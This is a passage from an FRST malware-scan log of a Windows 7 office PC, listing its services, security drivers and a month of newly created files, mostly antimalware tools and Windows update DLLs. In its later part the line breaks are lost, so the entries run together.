R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
R2 PrintTracker; C:\Program Files (x86)\Print Tracker\PMonitor.exe [722400 2016-07-11] (Print Tracker (866) 629-3342)
R2 ProtexisLicensing; C:\Windows\SysWOW64\PSIService.exe [174656 2006-11-02] () [File not signed]
R2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-10-03] (Symantec Corporation)
R3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe [2379128 2014-10-03] (Symantec Corporation)
S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe [335216 2014-10-03] (Symantec Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [13915888 2016-11-22] (Zemana Ltd.)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20161128.001\BHDrvx64.sys [1874136 2016-11-30] (Symantec Corporation)
S3 C781BUS; C:\Windows\System32\DRIVERS\C781BUS.sys [99200 2011-07-14] (DEVGURU Co., LTD.)
S3 C781Mdm; C:\Windows\System32\DRIVERS\C781Mdm.sys [183296 2011-07-14] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 C781Vsp; C:\Windows\System32\DRIVERS\C781Vsp.sys [183296 2011-07-14] (DEVGURU Co., LTD.(www.devguru.co.kr))
R1 ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys [169048 2014-10-03] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-12-05] (Symantec Corporation)
R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20161205.011\IDSvia64.sys [1012952 2016-10-26] (Symantec Corporation)
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-11-05] (LogMeIn, Inc.)
S4 LMIRfsClientNP; no ImagePath
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161206.001\ENG64.SYS [138456 2016-12-05] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161206.001\EX64.SYS [2148056 2016-12-05] (Symantec Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS [867032 2014-10-03] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS [36952 2014-10-03] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys [35432 2014-10-03] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS [493656 2014-10-03] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS [1148120 2014-10-03] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-03] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS [225496 2014-10-03] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS [437976 2014-10-03] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [155472 2014-10-03] (Symantec Corporation)
R1 ZAM; C:\Windows\System32\drivers\zam64.sys [203680 2016-12-07] (Zemana Ltd.)
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2016-12-07] (Zemana Ltd.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S0 pwygo; System32\drivers\bvbqpsa.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-07 05:16 - 2016-12-07 06:03 - 00034778 _____ C:\Windows\ZAM.krnl.trace
2016-12-07 05:16 - 2016-12-07 06:03 - 00012679 _____ C:\Windows\ZAM_Guard.krnl.trace
2016-12-07 05:16 - 2016-12-07 05:16 - 00203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zamguard64.sys
2016-12-07 05:16 - 2016-12-07 05:16 - 00203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zam64.sys
2016-12-07 05:16 - 2016-12-07 05:16 - 00000000 ____D C:\Users\Reception\AppData\Local\Zemana
2016-12-07 05:16 - 2016-12-07 05:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2016-12-07 05:16 - 2016-12-07 05:16 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware
2016-12-07 05:15 - 2016-12-07 05:15 - 05431336 _____ ( ) C:\Users\Reception\Downloads\Zemana.AntiMalware.Setup.exe
2016-12-06 05:52 - 2016-12-06 05:52 - 01065376 _____ (Google Inc.) C:\Users\Reception\Downloads\ChromeSetup (1).exe
2016-12-06 05:44 - 2016-12-06 05:44 - 00015182 _____ C:\Windows\system32\results.xml
2016-12-06 05:17 - 2016-12-06 05:17 - 40849704 _____ (Intel Corporation) C:\Users\Reception\Downloads\Win7Vista_64_151719.exe
2016-12-06 02:38 - 2016-12-06 02:38 - 125862080 _____ (Intel Corporation) C:\Users\Reception\Downloads\win64_153631.4414.exe
2016-12-06 02:36 - 2016-12-06 02:37 - 00000000 ____D C:\ProgramData\Package Cache
2016-12-06 02:35 - 2016-12-06 02:35 - 07491840 _____ (Intel) C:\Users\Reception\Downloads\Intel Driver Update Utility Installer.exe
2016-12-06 02:33 - 2016-12-06 02:33 - 86989752 _____ (Intel Corporation) C:\Users\Reception\Downloads\Win7Vista_64_152258.exe
2016-12-05 11:17 - 2016-12-05 11:17 - 00010168 ____N C:\bootsqm.dat
2016-12-02 04:56 - 2016-12-02 04:56 - 00244224 _____ C:\Users\Reception\Downloads\CF_UNINST.EXE
2016-12-02 03:02 - 2016-12-02 03:03 - 00000000 ____D C:\Program Files (x86)\CrystalDiskInfo
2016-12-02 03:02 - 2016-12-02 03:02 - 03956368 _____ (Crystal Dew World ) C:\Users\Reception\Downloads\CrystalDiskInfo7_0_4-en.exe
2016-12-02 03:02 - 2016-12-02 03:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2016-12-02 02:41 - 2016-12-02 02:45 - 00000000 ____D C:\Users\Reception\Doctor Web
2016-11-21 03:09 - 2016-12-07 06:03 - 00000000 ____D C:\FRST
2016-11-15 13:42 - 2016-11-15 15:41 - 00044360 __RSH C:\ProgramData\ntuser.pol
2016-11-14 18:46 - 2016-11-14 18:46 - 05659276 _____ (Swearware) C:\Users\Reception\Downloads\ComboFix (1).exe
2016-11-14 12:33 - 2016-11-14 12:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roadkil.Net
2016-11-14 12:33 - 2016-11-14 12:33 - 00000000 ____D C:\Program Files (x86)\Roadkil.Net
2016-11-14 12:32 - 2016-11-14 12:32 - 00362144 _____ (Roadkil.Net ) C:\Users\Reception\Downloads\CommTest.exe
2016-11-10 14:24 - 2016-07-14 04:09 - 00010240 _____ C:\Users\Reception\AppData\Local\Z@!-66cdbda3-850e-49fb-bcc4-315e343cf0e0.tmp
2016-11-10 14:24 - 2016-07-14 04:09 - 00009216 _____ C:\Users\Reception\AppData\Local\Z@S!-41305b6f-9545-4896-8e05-c1bc01799922.tmp
2016-11-10 14:23 - 2016-11-10 14:23 - 02308296 _____ (bomgar) C:\Users\Reception\Downloads\bomgar-scc-w0yc30wfd76ify8dz68xjy7xzf1ywwixfxi6xwc40jc90.exe
2016-11-09 14:24 - 2016-11-02 10:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-11-09 14:24 - 2016-11-02 10:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-11-09 14:24 - 2016-11-02 10:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-11-09 14:24 - 2016-11-02 10:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-11-09 14:24 - 2016-11-02 10:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-11-09 14:24 - 2016-11-02 10:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-11-09 14:24 - 2016-11-02 10:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-11-09 14:24 - 2016-11-02 10:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-11-09 14:24 - 2016-11-02 10:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-11-09 14:24 - 2016-11-02 09:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-11-09 14:24 - 2016-10-27 22:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-11-09 14:24 - 2016-10-27 22:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-11-09 14:24 - 2016-10-27 14:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-11-09 14:24 - 2016-10-27 14:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-11-09 14:24 - 2016-10-27 13:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-11-09 14:24 - 2016-10-27 13:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-11-09 14:24 - 2016-10-27 13:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2016-11-09 14:24 - 2016-10-27 13:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-11-09 14:24 - 2016-10-27 13:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2016-11-09 14:24 - 2016-10-27 13:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-11-09 14:24 - 2016-10-27 13:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-11-09 14:24 - 2016-10-27 13:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2016-11-09 14:24 - 2016-10-27 13:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-11-09 14:24 - 2016-10-27 13:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2016-11-09 14:24 - 2016-10-27 13:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-11-09 14:24 - 2016-10-27 13:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2016-11-09 14:24 - 2016-10-27 13:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-11-09 14:24 - 2016-10-27 13:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-11-09 14:24 - 2016-10-27 13:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2016-11-09 14:24 - 2016-10-27 13:13 - 00107520 _____ (Microsoft Corporation) 
C:\Windows\system32\inseng.dll 2016-11-09 14:24 - 2016-10-27 13:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2016-11-09 14:24 - 2016-10-27 13:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-11-09 14:24 - 2016-10-27 13:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-11-09 14:24 - 2016-10-27 13:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll 2016-11-09 14:24 - 2016-10-27 12:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2016-11-09 14:24 - 2016-10-27 12:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-11-09 14:24 - 2016-10-27 12:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2016-11-09 14:24 - 2016-10-27 12:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-11-09 14:24 - 2016-10-27 12:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2016-11-09 14:24 - 2016-10-27 12:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-11-09 14:24 - 2016-10-27 12:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-11-09 14:24 - 2016-10-27 12:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2016-11-09 14:24 - 2016-10-27 11:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2016-11-09 14:24 - 2016-10-27 10:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2016-11-09 14:24 - 2016-10-25 10:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2016-11-09 14:24 - 2016-10-22 12:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2016-11-09 14:24 - 2016-10-22 12:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2016-11-09 14:24 - 2016-10-22 12:36 - 00047616 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\ieetwproxystub.dll 2016-11-09 14:24 - 2016-10-22 12:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2016-11-09 14:24 - 2016-10-22 12:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2016-11-09 14:24 - 2016-10-22 12:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2016-11-09 14:24 - 2016-10-22 12:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2016-11-09 14:24 - 2016-10-22 12:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2016-11-09 14:24 - 2016-10-22 12:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2016-11-09 14:24 - 2016-10-22 12:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2016-11-09 14:24 - 2016-10-22 12:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2016-11-09 14:24 - 2016-10-22 12:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2016-11-09 14:24 - 2016-10-22 12:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2016-11-09 14:24 - 2016-10-22 12:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2016-11-09 14:24 - 2016-10-22 12:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2016-11-09 14:24 - 2016-10-22 12:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll 2016-11-09 14:24 - 2016-10-22 11:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2016-11-09 14:24 - 2016-10-22 11:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2016-11-09 14:24 - 2016-10-22 11:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2016-11-09 14:24 - 2016-10-22 11:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll 2016-11-09 14:24 - 2016-10-22 11:46 - 00230400 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\webcheck.dll 2016-11-09 14:24 - 2016-10-22 11:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2016-11-09 14:24 - 2016-10-22 11:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2016-11-09 14:24 - 2016-10-22 11:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2016-11-09 14:24 - 2016-10-22 11:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2016-11-09 14:24 - 2016-10-22 11:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2016-11-09 14:24 - 2016-10-22 11:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2016-11-09 14:24 - 2016-10-22 11:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2016-11-09 14:24 - 2016-10-22 11:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2016-11-09 14:24 - 2016-10-15 10:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll 2016-11-09 14:24 - 2016-10-15 10:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll 2016-11-09 14:24 - 2016-10-15 10:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll 2016-11-09 14:24 - 2016-10-15 10:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll 2016-11-09 14:24 - 2016-10-11 10:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys 2016-11-09 14:24 - 2016-10-11 10:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME 2016-11-09 14:24 - 2016-10-11 10:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll 2016-11-09 14:24 - 2016-10-11 10:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2016-11-09 14:24 - 2016-10-11 10:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll 
2016-11-09 14:24 - 2016-10-11 10:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME 2016-11-09 14:24 - 2016-10-11 10:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll 2016-11-09 14:24 - 2016-10-11 10:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL 2016-11-09 14:24 - 2016-10-11 10:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll 2016-11-09 14:24 - 2016-10-11 10:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00090112 
_____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime 2016-11-09 14:24 - 2016-10-11 08:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll 2016-11-09 14:24 - 2016-10-11 08:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll 2016-11-09 14:24 - 2016-10-10 10:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2016-11-09 14:24 - 2016-10-10 10:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2016-11-09 14:24 - 2016-10-10 10:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00146432 _____ 
(Microsoft Corporation) C:\Windows\system32\msaudite.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00022016 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\secur32.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2016-11-09 14:24 - 2016-10-10 10:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe 2016-11-09 14:24 - 2016-10-10 09:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe 2016-11-09 14:24 - 2016-10-10 09:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe 2016-11-09 14:24 - 2016-10-10 09:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll 2016-11-09 14:24 - 2016-10-07 10:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2016-11-09 14:24 - 2016-10-07 10:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-11-09 14:24 - 2016-10-07 10:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2016-11-09 14:24 - 2016-10-07 10:35 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00419840 _____ (Microsoft Corporation) 
